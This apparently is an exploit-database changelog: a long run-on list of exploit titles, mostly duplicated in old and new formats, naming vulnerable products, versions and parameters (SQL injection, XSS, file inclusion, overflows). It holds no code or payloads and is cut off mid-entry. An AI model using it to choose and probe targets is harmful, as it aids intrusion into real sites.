52c4bb1e58
5 new exploits AWStats (5.0-6.3) Input Validation Hole in 'logfile' AWStats 5.0-6.3 - Input Validation Hole in 'logfile' Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross-Site Scripting Apache mod_perl 'Apache::Status' and 'Apache2::Status' - Cross-Site Scripting Qualcomm WorldMail 3.0 IMAPD LIST Buffer Overflow Qualcomm WorldMail 3.0 - IMAPD LIST Buffer Overflow WorldMail imapd 3.0 SEH Overflow (egg hunter) WorldMail IMAPd 3.0 - SEH Overflow (Egg Hunter) e107 website system 0.7.5 contact.php Query String (PATH_INFO) Parameter XSS e107 website system 0.7.5 download.php Query String (PATH_INFO) Parameter XSS e107 website system 0.7.5 admin.php Query String (PATH_INFO) Parameter XSS e107 website system 0.7.5 fpw.php Query String (PATH_INFO) Parameter XSS e107 website system 0.7.5 news.php Query String (PATH_INFO) Parameter XSS e107 website system 0.7.5 - contact.php Query String (PATH_INFO) Parameter XSS e107 website system 0.7.5 - download.php Query String (PATH_INFO) Parameter XSS e107 website system 0.7.5 - admin.php Query String (PATH_INFO) Parameter XSS e107 website system 0.7.5 - fpw.php Query String (PATH_INFO) Parameter XSS e107 website system 0.7.5 - news.php Query String (PATH_INFO) Parameter XSS e107 website system 0.7.5 signup.php Query String (PATH_INFO) Parameter XSS e107 website system 0.7.5 submitnews.php Query String (PATH_INFO) Parameter XSS e107 website system 0.7.5 - signup.php Query String (PATH_INFO) Parameter XSS e107 website system 0.7.5 - submitnews.php Query String (PATH_INFO) Parameter XSS e107 website system 0.7.5 user.php Query String (PATH_INFO) Parameter XSS e107 website system 0.7.5 - user.php Query String (PATH_INFO) Parameter XSS Apache + PHP < 5.3.12 / < 5.4.2 - Remote Code Execution (Multithreaded Scanner) Apache + PHP < 5.3.12 / < 5.4.2 - Remote Code Execution (Multithreaded Scanner) (1) PHP-Nuke Sarkilar Module 'id' Parameter SQL Injection PHP-Nuke Sarkilar Module - 'id' Parameter SQL Injection PHP-Nuke Nuke League Module 'tid' Parameter Cross-Site Scripting PHP-Nuke Nuke League Module - 'tid' Parameter Cross-Site Scripting Kimson CMS 'id' Parameter Cross-Site Scripting Kimson CMS - 'id' Parameter Cross-Site Scripting Ocean12 FAQ Manager Pro 'Keyword' Parameter Cross-Site Scripting Multiple Ocean12 Products 'Admin_ID' Parameter SQL Injection Ocean12 FAQ Manager Pro - 'Keyword' Parameter Cross-Site Scripting Multiple Ocean12 Products - 'Admin_ID' Parameter SQL Injection LinksPro 'OrderDirection' Parameter SQL Injection LinksPro - 'OrderDirection' Parameter SQL Injection PHP-Nuke Downloads Module 'url' Parameter SQL Injection PHP-Nuke Downloads Module - 'url' Parameter SQL Injection PHP 5.2.9 cURL 'safe_mode' and 'open_basedir' Restriction-Bypass PHP 5.2.9 cURL - 'safe_mode' and 'open_basedir' Restriction-Bypass PuterJam\'s Blog PJBlog3 3.0.6 \'action.asp\' SQL Injection PuterJam's Blog PJBlog3 3.0.6 - 'action.asp' SQL Injection PHP-Nuke 8.0 Downloads Module 'query' Parameter Cross-Site Scripting PHP-Nuke 8.0 Downloads Module - 'query' Parameter Cross-Site Scripting Oracle 10g Secure Enterprise Search 'search_p_groups' Parameter Cross-Site Scripting Oracle 10g Secure Enterprise Search - 'search_p_groups' Parameter Cross-Site Scripting Scriptsez Easy Image Downloader 'id' Parameter Cross-Site Scripting Scriptsez Easy Image Downloader - 'id' Parameter Cross-Site Scripting XOOPS 2.3.3 \\\'op\\\' Parameter Multiple Cross-Site Scripting Vulnerabilities XOOPS 2.3.3 - 'op' Parameter Multiple Cross-Site Scripting Vulnerabilities Joomla! CB Resume Builder 'group_id' Parameter SQL Injection X-Cart Email Subscription 'email' Parameter Cross-Site Scripting Joomla! CB Resume Builder - 'group_id' Parameter SQL Injection X-Cart Email Subscription - 'email' Parameter Cross-Site Scripting RunCMS 'forum' Parameter SQL Injection RunCMS - 'forum' Parameter SQL Injection Multiple JiRo's Products 'files/login.asp' Multiple SQL Injection Multiple JiRo's Products - 'files/login.asp' Multiple SQL Injection Elxis 'filename' Parameter Directory Traversal Elxis - 'filename' Parameter Directory Traversal Ez Cart 'sid' Parameter Cross-Site Scripting Ez Cart - 'sid' Parameter Cross-Site Scripting Joomla! iF Portfolio Nexus 'controller' Parameter Remote File Inclusion Joomla! iF Portfolio Nexus - 'controller' Parameter Remote File Inclusion Joomla! Jobads 'type' Parameter SQL Injection Joomla! Jobads - 'type' Parameter SQL Injection Jamit Job Board 'post_id' Parameter Cross-Site Scripting Jamit Job Board - 'post_id' Parameter Cross-Site Scripting Tribisur 'cat' Parameter Cross-Site Scripting Tribisur - 'cat' Parameter Cross-Site Scripting Extreme Mobster 'login' Parameter Cross-Site Scripting Extreme Mobster - 'login' Parameter Cross-Site Scripting Subex Nikira Fraud Management System GUI 'message' Parameter Cross-Site Scripting Subex Nikira Fraud Management System GUI - 'message' Parameter Cross-Site Scripting Softbiz Jobs 'sbad_type' Parameter Cross-Site Scripting Softbiz Jobs - 'sbad_type' Parameter Cross-Site Scripting HD FLV Player Component for Joomla! 'id' Parameter SQL Injection HD FLV Player Component for Joomla! - 'id' Parameter SQL Injection Spectrum Software WebManager CMS 'pojam' Parameter Cross-Site Scripting Saskia's Shopsystem 'id' Parameter Local File Inclusion Spectrum Software WebManager CMS - 'pojam' Parameter Cross-Site Scripting Saskia's Shopsystem - 'id' Parameter Local File Inclusion Pars CMS 'RP' Parameter Multiple SQL Injection Pars CMS - 'RP' Parameter Multiple SQL Injection Kasseler CMS News Module 'id' Parameter SQL Injection Kasseler CMS News Module - 'id' Parameter SQL Injection Ziggurat Farsi CMS 'id' Parameter Unspecified Cross-Site Scripting Ziggurat Farsi CMS - 'id' Parameter Unspecified Cross-Site Scripting Vana CMS 'filename' Parameter Remote File Download Vana CMS - 'filename' Parameter Remote File Download Ziggurrat Farsi CMS 'bck' Parameter Directory Traversal Ziggurrat Farsi CMS - 'bck' Parameter Directory Traversal Viennabux Beta! 'cat' Parameter SQL Injection Viennabux Beta! - 'cat' Parameter SQL Injection HP System Management Homepage 'RedirectUrl' Parameter URI Redirection HP System Management Homepage - 'RedirectUrl' Parameter URI Redirection Sterlite SAM300 AX Router 'Stat_Radio' Parameter Cross-Site Scripting Sterlite SAM300 AX Router - 'Stat_Radio' Parameter Cross-Site Scripting Last Wizardz 'id' Parameter SQL Injection Last Wizardz - 'id' Parameter SQL Injection Plesk Server Administrator (PSA) 'locale' Parameter Local File Inclusion Plesk Server Administrator (PSA) - 'locale' Parameter Local File Inclusion VideoWhisper PHP 2 Way Video Chat 'r' Parameter Cross-Site Scripting VideoWhisper PHP 2 Way Video Chat - 'r' Parameter Cross-Site Scripting KubeSupport 'lang' Parameter SQL Injection KubeSupport - 'lang' Parameter SQL Injection ReCMS 'users_lang' Parameter Directory Traversal ReCMS - 'users_lang' Parameter Directory Traversal jCore 'search' Parameter Cross-Site Scripting jCore - 'search' Parameter Cross-Site Scripting PHP168 Template Editor 'filename' Parameter Directory Traversal PHP168 Template Editor - 'filename' Parameter Directory Traversal uzbl \'uzbl-core\' \'@SELECTED_URI\' Mouse Button Bindings Command Injection uzbl 'uzbl-core' - '@SELECTED_URI' Mouse Button Bindings Command Injection SyntaxCMS 'rows_per_page' Parameter SQL Injection Edit-X PHP CMS 'search_text' Parameter Cross-Site Scripting SyntaxCMS - 'rows_per_page' Parameter SQL Injection Edit-X PHP CMS - 'search_text' Parameter Cross-Site Scripting Nasim Guest Book 'page' Parameter Cross-Site Scripting Nasim Guest Book - 'page' Parameter Cross-Site Scripting FreeSchool 'key_words' Parameter Cross-Site Scripting FreeSchool - 'key_words' Parameter Cross-Site Scripting tourismscripts HotelBook 'hotel_id' Parameter Multiple SQL Injection tourismscripts HotelBook - 'hotel_id' Parameter Multiple SQL Injection Spiceworks 'query' Parameter Cross-Site Scripting Spiceworks - 'query' Parameter Cross-Site Scripting NWS-Classifieds 'cmd' Parameter Local File Inclusion NWS-Classifieds - 'cmd' Parameter Local File Inclusion WebAsyst Shop-Script PREMIUM 'searchstring' Parameter Cross-Site Scripting WebAsyst Shop-Script PREMIUM - 'searchstring' Parameter Cross-Site Scripting Web TV 'chn' Parameter Cross-Site Scripting Web TV - 'chn' Parameter Cross-Site Scripting Honest Traffic 'msg' Parameter Cross-Site Scripting Honest Traffic - 'msg' Parameter Cross-Site Scripting PHP Photo Vote 1.3F 'page' Parameter Cross-Site Scripting PHP Photo Vote 1.3F - 'page' Parameter Cross-Site Scripting Wap-motor 'image' Parameter Directory Traversal Wap-motor - 'image' Parameter Directory Traversal QuarkMail 'tf' Parameter Directory Traversal QuarkMail - 'tf' Parameter Directory Traversal Microsoft Windows VISTA 'lpksetup.exe' 'oci.dll' DLL Loading Arbitrary Code Execution Microsoft Windows VISTA - 'lpksetup.exe' 'oci.dll' DLL Loading Arbitrary Code Execution LES PACKS 'ID' Parameter SQL Injection LES PACKS - 'ID' Parameter SQL Injection PHPShop 2.1 EE 'name_new' Parameter Cross-Site Scripting PHPShop 2.1 EE - 'name_new' Parameter Cross-Site Scripting IBM OmniFind 'command' Parameter Cross-Site Scripting IBM OmniFind - 'command' Parameter Cross-Site Scripting Joomla Store Directory 'id' Parameter SQL Injection Joomla Store Directory - 'id' Parameter SQL Injection PHP State 'id' Parameter SQL Injection Joomla Jeformcr 'id' Parameter SQL Injection JExtensions Property Finder Component for Joomla! 'sf_id' Parameter SQL Injection PHP State - 'id' Parameter SQL Injection Joomla Jeformcr - 'id' Parameter SQL Injection JExtensions Property Finder Component for Joomla! - 'sf_id' Parameter SQL Injection Social Share 'postid' Parameter SQL Injection Social Share - 'postid' Parameter SQL Injection Openfiler 'device' Parameter Cross-Site Scripting Openfiler - 'device' Parameter Cross-Site Scripting Social Share 'username' Parameter SQL Injection Social Share - 'username' Parameter SQL Injection Social Share 'search' Parameter Cross-Site Scripting HotWeb Scripts HotWeb Rentals 'PageId' Parameter SQL Injection Social Share - 'search' Parameter Cross-Site Scripting HotWeb Scripts HotWeb Rentals - 'PageId' Parameter SQL Injection SnapProof 'retPageID' Parameter Cross-Site Scripting SnapProof - 'retPageID' Parameter Cross-Site Scripting VidiScript 'vp' Parameter Cross-Site Scripting VidiScript - 'vp' Parameter Cross-Site Scripting PHP-Fusion 'article_id' Parameter SQL Injection PHP-Fusion - 'article_id' Parameter SQL Injection Qianbo Enterprise Web Site Management System 'Keyword' Parameter Cross-Site Scripting RunCMS 'partners' Module 'id' Parameter SQL Injection Qianbo Enterprise Web Site Management System - 'Keyword' Parameter Cross-Site Scripting RunCMS 'partners' Module - 'id' Parameter SQL Injection Technicolor THOMSON TG585v7 Wireless Router 'url' Parameter Cross-Site Scripting Technicolor THOMSON TG585v7 Wireless Router - 'url' Parameter Cross-Site Scripting SyCtel Design 'menu' Parameter Multiple Local File Inclusion SyCtel Design - 'menu' Parameter Multiple Local File Inclusion phpGraphy 0.9.13 b 'theme_dir' Parameter Cross-Site Scripting phpGraphy 0.9.13 b - 'theme_dir' Parameter Cross-Site Scripting Web Auction 0.3.6 'lang' Parameter Cross-Site Scripting Web Auction 0.3.6 - 'lang' Parameter Cross-Site Scripting Multiple GoT.MY Products 'theme_dir' Parameter Cross-Site Scripting Multiple GoT.MY Products - 'theme_dir' Parameter Cross-Site Scripting Flash Tag Cloud And MT-Cumulus Plugin 'tagcloud' Parameter Cross-Site Scripting Flash Tag Cloud And MT-Cumulus Plugin - 'tagcloud' Parameter Cross-Site Scripting Joomla! 'com_cbcontact' Component 'contact_id' Parameter SQL Injection Joomla! 'com_cbcontact' Component - 'contact_id' Parameter SQL Injection Joomla! 'com_maplocator' Component 'cid' Parameter SQL Injection Joomla! 'com_maplocator' Component - 'cid' Parameter SQL Injection Tolinet Agencia 'id' Parameter SQL Injection Tolinet Agencia - 'id' Parameter SQL Injection WebFileExplorer 3.6 'user' and 'pass' SQL Injection WebFileExplorer 3.6 - 'user' and 'pass' SQL Injection Sitemagic CMS 'SMTpl' Parameter Directory Traversal Sitemagic CMS - 'SMTpl' Parameter Directory Traversal Nodesforum '_nodesforum_node' Parameter SQL Injection Joomla! 'com_morfeoshow' Component 'idm' Parameter SQL Injection Nodesforum - '_nodesforum_node' Parameter SQL Injection Joomla! 'com_morfeoshow' Component - 'idm' Parameter SQL Injection Joomla! 'com_jr_tfb' Component 'controller' Parameter Local File Inclusion Joomla! 'com_jr_tfb' Component - 'controller' Parameter Local File Inclusion eTAWASOL 'id' Parameter SQL Injection eTAWASOL - 'id' Parameter SQL Injection Prontus CMS 'page' Parameter Cross-Site Scripting ICMusic '1.2 music_id' Parameter SQL Injection Prontus CMS - 'page' Parameter Cross-Site Scripting ICMusic 1.2 - 'music_id' Parameter SQL Injection Flowplayer 3.2.7 linkUrl' Parameter Cross-Site Scripting Flowplayer 3.2.7 - 'linkUrl' Parameter Cross-Site Scripting Easy Estate Rental 's_location' Parameter SQL Injection Joomla Foto Component 'id_categoria' Parameter SQL Injection Easy Estate Rental - 's_location' Parameter SQL Injection Joomla Foto Component - 'id_categoria' Parameter SQL Injection Joomla Juicy Gallery Component 'picId' Parameter SQL Injection Joomla Juicy Gallery Component - 'picId' Parameter SQL Injection Joomla Controller Component 'Itemid' Parameter SQL Injection Joomla Controller Component - 'Itemid' Parameter SQL Injection Synergy Software 'id' Parameter SQL Injection Godly Forums 'id' Parameter SQL Injection Synergy Software - 'id' Parameter SQL Injection Godly Forums - 'id' Parameter SQL Injection MyBB MyTabs Plugin 'tab' Parameter SQL Injection MyBB MyTabs Plugin - 'tab' Parameter SQL Injection mt LinkDatenbank 'b' Parameter Cross-Site Scripting mt LinkDatenbank - 'b' Parameter Cross-Site Scripting Joomla! Slideshow Gallery Component 'id' Parameter SQL Injection Joomla! Slideshow Gallery Component - 'id' Parameter SQL Injection Joomla! 'com_community' Component 'userid' Parameter SQL Injection Joomla! 'com_community' Component - 'userid' Parameter SQL Injection phpWebSite 'page_id' Parameter Cross-Site Scripting phpWebSite - 'page_id' Parameter Cross-Site Scripting Tourismscripts Hotel Portal 'hotel_city' Parameter HTML Injection VicBlog 'tag' Parameter SQL Injection Tourismscripts Hotel Portal - 'hotel_city' Parameter HTML Injection VicBlog - 'tag' Parameter SQL Injection Kisanji 'gr' Parameter Cross-Site Scripting Kisanji - 'gr' Parameter Cross-Site Scripting Joomla! 'com_biitatemplateshop' Component 'groups' Parameter SQL Injection Joomla! 'com_biitatemplateshop' Component - 'groups' Parameter SQL Injection Vanira CMS 'vtpidshow' Parameter SQL Injection Vanira CMS - 'vtpidshow' Parameter SQL Injection Joomla! 'com_expedition' Component 'id' Parameter SQL Injection Joomla! 'com_expedition' Component - 'id' Parameter SQL Injection Joomla! 'com_tree' Component 'key' Parameter SQL Injection Joomla! 'com_br' Component 'state_id' Parameter SQL Injection Joomla! 'com_shop' Component 'id' Parameter SQL Injection Joomla! 'com_tree' Component - 'key' Parameter SQL Injection Joomla! 'com_br' Component - 'state_id' Parameter SQL Injection Joomla! 'com_shop' Component - 'id' Parameter SQL Injection Splunk 4.1.6 'segment' Parameter Cross-Site Scripting Splunk 4.1.6 - 'segment' Parameter Cross-Site Scripting Multiple Cisco Products 'file' Parameter Directory Traversal Multiple Cisco Products - 'file' Parameter Directory Traversal IBSng B1.34(T96) 'str' Parameter Cross-Site Scripting IBSng B1.34(T96) - 'str' Parameter Cross-Site Scripting SmartJobBoard 'keywords' Parameter Cross-Site Scripting SmartJobBoard - 'keywords' Parameter Cross-Site Scripting Joomla Content Component 'year' Parameter SQL Injection Joomla Content Component - 'year' Parameter SQL Injection Webistry 1.6 'pid' Parameter SQL Injection Webistry 1.6 - 'pid' Parameter SQL Injection WordPress Skysa App Bar Plugin 'idnews' Parameter Cross-Site Scripting WordPress Skysa App Bar Plugin - 'idnews' Parameter Cross-Site Scripting Video Community Portal 'userID' Parameter SQL Injection Video Community Portal - 'userID' Parameter SQL Injection PHP Booking Calendar 10e 'page_info_message' Parameter Cross-Site Scripting Joomla! 'com_tsonymf' Component 'idofitem' Parameter SQL Injection PHP Booking Calendar 10e - 'page_info_message' Parameter Cross-Site Scripting Joomla! 'com_tsonymf' Component - 'idofitem' Parameter SQL Injection Joomla! 'com_caproductprices' Component 'id' Parameter SQL Injection Joomla! 'com_caproductprices' Component - 'id' Parameter SQL Injection GraphicsClone Script 'term' parameter Cross-Site Scripting GraphicsClone Script - 'term' parameter Cross-Site Scripting PostNuke pnAddressbook Module 'id' Parameter SQL Injection PostNuke pnAddressbook Module - 'id' Parameter SQL Injection Joomla! 'com_br' Component 'controller' Parameter Local File Inclusion Joomla! 'com_br' Component - 'controller' Parameter Local File Inclusion Joomla! Full 'com_full' Component 'id' Parameter SQL Injection Joomla! Full 'com_full' Component - 'id' Parameter SQL Injection Joomla! 'com_xball' Component 'team_id' Parameter SQL Injection Joomla! 'com_boss' Component 'controller' Parameter Local File Inclusion Joomla! 'com_xball' Component - 'team_id' Parameter SQL Injection Joomla! 'com_boss' Component - 'controller' Parameter Local File Inclusion Joomla! 'com_some' Component 'controller' Parameter Local File Inclusion Joomla! 'com_bulkenquery' Component 'controller' Parameter Local File Inclusion Joomla! 'com_kp' Component 'controller' Parameter Local File Inclusion Joomla! 'com_some' Component - 'controller' Parameter Local File Inclusion Joomla! 'com_bulkenquery' Component - 'controller' Parameter Local File Inclusion Joomla! 'com_kp' Component - 'controller' Parameter Local File Inclusion Ultimate Locator 'radius' Parameter SQL Injection Joomla! 'com_jesubmit' Component 'index.php' Arbitrary File Upload Ultimate Locator - 'radius' Parameter SQL Injection Joomla! 'com_jesubmit' Component - 'index.php' Arbitrary File Upload Joomla! 'com_motor' Component 'cid' Parameter SQL Injection Joomla! 'com_motor' Component - 'cid' Parameter SQL Injection Joomla! 'com_firmy' Component 'Id' Parameter SQL Injection Joomla! 'com_firmy' Component - 'Id' Parameter SQL Injection Joomla! 'com_crhotels' Component 'catid' Parameter SQL Injection Joomla! 'com_propertylab' Component 'id' Parameter SQL Injection Joomla! 'com_crhotels' Component - 'catid' Parameter SQL Injection Joomla! 'com_propertylab' Component - 'id' Parameter SQL Injection Joomla! 'com_cmotour' Component 'id' Parameter SQL Injection Joomla! 'com_cmotour' Component - 'id' Parameter SQL Injection Joomla! 'com_bnf' Component 'seccion_id' Parameter SQL Injection Joomla! 'com_bnf' Component - 'seccion_id' Parameter SQL Injection Joomla! Currency Converter Component 'from' Parameter Cross-Site Scripting Joomla! Currency Converter Component - 'from' Parameter Cross-Site Scripting RabbitWiki 'title' Parameter Cross-Site Scripting RabbitWiki - 'title' Parameter Cross-Site Scripting Zimbra 'view' Parameter Cross-Site Scripting Zimbra - 'view' Parameter Cross-Site Scripting SMW+ 1.5.6 'target' Parameter HTML Injection SMW+ 1.5.6 - 'target' Parameter HTML Injection ProWiki 'id' Parameter Cross-Site Scripting ProWiki - 'id' Parameter Cross-Site Scripting Tiki Wiki CMS Groupware 'url' Parameter URI Redirection Tiki Wiki CMS Groupware - 'url' Parameter URI Redirection Impulsio CMS 'id' Parameter SQL Injection Impulsio CMS - 'id' Parameter SQL Injection Joomla! X-Shop Component 'idd' Parameter SQL Injection Joomla! X-Shop Component - 'idd' Parameter SQL Injection Joomla! 'com_xvs' Component 'controller' Parameter Local File Inclusion Joomla! 'com_xvs' Component - 'controller' Parameter Local File Inclusion starCMS 'q' Parameter URI Cross-Site Scripting starCMS - 'q' Parameter URI Cross-Site Scripting JPM Article Script 6 'page2' Parameter SQL Injection JPM Article Script 6 - 'page2' Parameter SQL Injection LeKommerce 'id' Parameter SQL Injection LeKommerce - 'id' Parameter SQL Injection Event Calendar PHP 'cal_year' Parameter Cross-Site Scripting Event Calendar PHP - 'cal_year' Parameter Cross-Site Scripting XM Forum 'id' Parameter Multiple SQL Injection Uiga FanClub 'p' Parameter SQL Injection XM Forum - 'id' Parameter Multiple SQL Injection Uiga FanClub - 'p' Parameter SQL Injection WordPress WPsc MijnPress Plugin 'rwflush' Parameter Cross-Site Scripting WordPress WPsc MijnPress Plugin - 'rwflush' Parameter Cross-Site Scripting Ramui Forum Script 'query' Parameter Cross-Site Scripting Ramui Forum Script - 'query' Parameter Cross-Site Scripting GD Star Rating 1.9.16 'tpl_section' Parameter Cross-Site Scripting GD Star Rating 1.9.16 - 'tpl_section' Parameter Cross-Site Scripting LongTail JW Player 'debug' Parameter Cross-Site Scripting LongTail JW Player - 'debug' Parameter Cross-Site Scripting Small-Cms 'hostname' Parameter Remote PHP Code Injection Small-Cms - 'hostname' Parameter Remote PHP Code Injection Joomla! Alphacontent Component 'limitstart' Parameter SQL Injection Joomla! Alphacontent Component - 'limitstart' Parameter SQL Injection Flogr 'tag' Parameter Multiple Cross-Site Scripting Vulnerabilities Flogr - 'tag' Parameter Multiple Cross-Site Scripting Vulnerabilities e107 Image Gallery Plugin 'name' Parameter Remote File Disclosure e107 Image Gallery Plugin - 'name' Parameter Remote File Disclosure Joomla! 'com_szallasok' Component 'id' Parameter SQL Injection Joomla! 'com_szallasok' Component - 'id' Parameter SQL Injection SWFUpload 'movieName' Parameter Cross-Site Scripting SWFUpload - 'movieName' Parameter Cross-Site Scripting WordPress SocialFit Plugin 'msg' Parameter Cross-Site Scripting WordPress custom tables Plugin 'key' Parameter Cross-Site Scripting WordPress church_admin Plugin 'id' parameter Cross-Site Scripting WordPress SocialFit Plugin - 'msg' Parameter Cross-Site Scripting WordPress custom tables Plugin - 'key' Parameter Cross-Site Scripting WordPress church_admin Plugin - 'id' parameter Cross-Site Scripting sflog! 'section' Parameter Local File Inclusion sflog! - 'section' Parameter Local File Inclusion WebsitePanel 'ReturnUrl' Parameter URI Redirection WebsitePanel - 'ReturnUrl' Parameter URI Redirection WordPress Post Recommendations Plugin 'abspath' Parameter Remote File Inclusion web@all 'name' Parameter Cross-Site Scripting WordPress Post Recommendations Plugin - 'abspath' Parameter Remote File Inclusion web@all - 'name' Parameter Cross-Site Scripting Joomla! 'com_hello' Component 'controller' Parameter Local File Inclusion Joomla! 'com_hello' Component - 'controller' Parameter Local File Inclusion REDAXO 'subpage' Parameter Cross-Site Scripting Joomla Odudeprofile component 'profession' Parameter SQL Injection REDAXO - 'subpage' Parameter Cross-Site Scripting Joomla Odudeprofile component - 'profession' Parameter SQL Injection BarCodeWiz 'BarcodeWiz.dll' ActiveX Control 'Barcode' Method Remote Buffer Overflow BarCodeWiz 'BarcodeWiz.dll' ActiveX Control - 'Barcode' Method Remote Buffer Overflow JW Player 'playerready' Parameter Cross-Site Scripting eNdonesia 'cid' Parameter SQL Injection JW Player - 'playerready' Parameter Cross-Site Scripting eNdonesia - 'cid' Parameter SQL Injection ntop 'arbfile' Parameter Cross-Site Scripting ntop - 'arbfile' Parameter Cross-Site Scripting Elefant CMS 'id' Parameter Cross-Site Scripting Elefant CMS - 'id' Parameter Cross-Site Scripting YT-Videos Script 'id' Parameter SQL Injection YT-Videos Script - 'id' Parameter SQL Injection GetSimple 'path' Parameter Local File Inclusion GetSimple - 'path' Parameter Local File Inclusion LISTSERV 16 'SHOWTPL' Parameter Cross-Site Scripting LISTSERV 16 - 'SHOWTPL' Parameter Cross-Site Scripting JPM Article Blog Script 6 'tid' Parameter Cross-Site Scripting JPM Article Blog Script 6 - 'tid' Parameter Cross-Site Scripting KindEditor 'name' Parameter Cross-Site Scripting KindEditor - 'name' Parameter Cross-Site Scripting PHP Web Scripts Ad Manager Pro 'page' Parameter Local File Inclusion PHP Web Scripts Ad Manager Pro - 'page' Parameter Local File Inclusion JW Player 'logo.link' Parameter Cross-Site Scripting JW Player - 'logo.link' Parameter Cross-Site Scripting PHP Web Scripts Text Exchange Pro 'page' Parameter Local File Inclusion Joomla! Komento Component 'cid' Parameter SQL Injection PHP Web Scripts Text Exchange Pro - 'page' Parameter Local File Inclusion Joomla! Komento Component - 'cid' Parameter SQL Injection WordPress Cloudsafe365 Plugin 'file' Parameter Remote File Disclosure WordPress Cloudsafe365 Plugin - 'file' Parameter Remote File Disclosure Wiki Web Help 'configpath' Parameter Remote File Inclusion Wiki Web Help - 'configpath' Parameter Remote File Inclusion LiteSpeed Web Server 'gtitle' parameter Cross-Site Scripting LiteSpeed Web Server - 'gtitle' parameter Cross-Site Scripting WordPress Download Monitor Plugin 'dlsearch' Parameter Cross-Site Scripting WordPress Download Monitor Plugin - 'dlsearch' Parameter Cross-Site Scripting FBDj 'id' Parameter SQL Injection FBDj - 'id' Parameter SQL Injection vBSEO 'u' parameter Cross-Site Scripting vBSEO - 'u' parameter Cross-Site Scripting WordPress Crayon Syntax Highlighter Plugin 'wp_load' Parameter Remote File Inclusion WordPress Crayon Syntax Highlighter Plugin - 'wp_load' Parameter Remote File Inclusion TAGWORX.CMS 'cid' Parameter SQL Injection TAGWORX.CMS - 'cid' Parameter SQL Injection WordPress Video Lead Form Plugin 'errMsg' Parameter Cross-Site Scripting WordPress Video Lead Form Plugin - 'errMsg' Parameter Cross-Site Scripting WordPress Token Manager Plugin 'tid' Parameter Cross-Site Scripting WordPress Token Manager Plugin - 'tid' Parameter Cross-Site Scripting Neturf eCommerce Shopping Cart 'SearchFor' Parameter Cross-Site Scripting Neturf eCommerce Shopping Cart - 'SearchFor' Parameter Cross-Site Scripting WordPress ABC Test Plugin 'id' Parameter Cross-Site Scripting WordPress ABC Test Plugin - 'id' Parameter Cross-Site Scripting Open Realty 'select_users_lang' Parameter Local File Inclusion Open Realty - 'select_users_lang' Parameter Local File Inclusion FirePass 7.0 SSL VPN 'refreshURL' Parameter URI Redirection FirePass 7.0 SSL VPN - 'refreshURL' Parameter URI Redirection SMF 'view' Parameter Cross-Site Scripting SMF - 'view' Parameter Cross-Site Scripting Gramophone 'rs' Parameter Cross-Site Scripting Gramophone - 'rs' Parameter Cross-Site Scripting Joomla! com_parcoauto Component 'idVeicolo' Parameter SQL Injection Joomla! com_parcoauto Component - 'idVeicolo' Parameter SQL Injection OrangeHRM 'sortField' Parameter SQL Injection WordPress FLV Player Plugin 'id' Parameter SQL Injection OrangeHRM - 'sortField' Parameter SQL Injection WordPress FLV Player Plugin - 'id' Parameter SQL Injection WordPress Kakao Theme 'ID' Parameter SQL Injection WordPress PHP Event Calendar Plugin 'cid' Parameter SQL Injection WordPress Eco-annu Plugin 'eid' Parameter SQL Injection WordPress Kakao Theme - 'ID' Parameter SQL Injection WordPress PHP Event Calendar Plugin - 'cid' Parameter SQL Injection WordPress Eco-annu Plugin - 'eid' Parameter SQL Injection WordPress Dailyedition-mouss Theme 'id' Parameter SQL Injection WordPress Tagged Albums Plugin 'id' Parameter SQL Injection WordPress Dailyedition-mouss Theme - 'id' Parameter SQL Injection WordPress Tagged Albums Plugin - 'id' Parameter SQL Injection Omni-Secure 'dir' Parameter Multiple File Disclosure Vulnerabilities Friends in War The FAQ Manager 'question' Parameter SQL Injection Omni-Secure - 'dir' Parameter Multiple File Disclosure Vulnerabilities Friends in War The FAQ Manager - 'question' Parameter SQL Injection openSIS 'modname' Parameter Local File Inclusion openSIS - 'modname' Parameter Local File Inclusion WordPress Madebymilk Theme 'id' Parameter SQL Injection WordPress Madebymilk Theme - 'id' Parameter SQL Injection WordPress Zingiri Web Shop Plugin 'path' Parameter Arbitrary File Upload WordPress Webplayer Plugin 'id' Parameter SQL Injection WordPress Plg Novana Plugin 'id' Parameter SQL Injection WordPress Zingiri Web Shop Plugin - 'path' Parameter Arbitrary File Upload WordPress Webplayer Plugin - 'id' Parameter SQL Injection WordPress Plg Novana Plugin - 'id' Parameter SQL Injection WordPress Magazine Basic Theme 'id' Parameter SQL Injection WordPress Magazine Basic Theme - 'id' Parameter SQL Injection WordPress Ads Box Plugin 'count' Parameter SQL Injection WordPress Ads Box Plugin - 'count' Parameter SQL Injection Forescout CounterACT 'a' Parameter Open Redirection WordPress Wp-ImageZoom Theme 'id' Parameter SQL Injection Forescout CounterACT - 'a' Parameter Open Redirection WordPress Wp-ImageZoom Theme - 'id' Parameter SQL Injection WordPress Toolbox Theme 'mls' Parameter SQL Injection Elastix 'page' Parameter Cross-Site Scripting TinyMCPUK 'test' Parameter Cross-Site Scripting WordPress Toolbox Theme - 'mls' Parameter SQL Injection Elastix - 'page' Parameter Cross-Site Scripting TinyMCPUK - 'test' Parameter Cross-Site Scripting WordPress Zingiri Forums Plugin 'language' Parameter Local File Inclusion WordPress Nest Theme 'codigo' Parameter SQL Injection Sourcefabric Newscoop 'f_email' Parameter SQL Injection WordPress Zingiri Forums Plugin - 'language' Parameter Local File Inclusion WordPress Nest Theme - 'codigo' Parameter SQL Injection Sourcefabric Newscoop - 'f_email' Parameter SQL Injection FOOT Gestion 'id' Parameter SQL Injection FOOT Gestion - 'id' Parameter SQL Injection PHP Address Book 'group' Parameter Cross-Site Scripting PHP Address Book - 'group' Parameter Cross-Site Scripting Joomla! ZT Autolinks Component 'controller' Parameter Local File Inclusion Joomla! Bit Component 'controller' Parameter Local File Inclusion Joomla! ZT Autolinks Component - 'controller' Parameter Local File Inclusion Joomla! Bit Component - 'controller' Parameter Local File Inclusion MyBB Transactions Plugin 'transaction' Parameter SQL Injection MyBB Transactions Plugin - 'transaction' Parameter SQL Injection WHM 'filtername' Parameter Cross-Site Scripting WHM - 'filtername' Parameter Cross-Site Scripting Havalite CMS 'comment' Parameter HTML Injection Havalite CMS - 'comment' Parameter HTML Injection WordPress NextGEN Gallery Plugin 'test-head' Parameter Cross-Site Scripting WordPress NextGEN Gallery Plugin - 'test-head' Parameter Cross-Site Scripting WordPress Gallery Plugin 'filename_1' Parameter Remote Arbitrary File Access WordPress Gallery Plugin - 'filename_1' Parameter Remote Arbitrary File Access phpLiteAdmin 'table' Parameter SQL Injection IP.Gallery 'img' Parameter SQL Injection phpLiteAdmin - 'table' Parameter SQL Injection IP.Gallery - 'img' 